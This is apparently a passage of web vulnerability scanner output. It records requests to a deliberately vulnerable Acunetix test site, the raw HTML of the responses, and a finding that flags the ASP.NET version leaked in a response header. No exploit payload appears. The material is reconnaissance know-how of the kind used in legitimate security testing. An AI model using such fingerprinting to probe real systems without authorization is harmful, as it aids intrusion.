value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi/TB7mR4IysbuEg0lOgmHIs" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:24 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 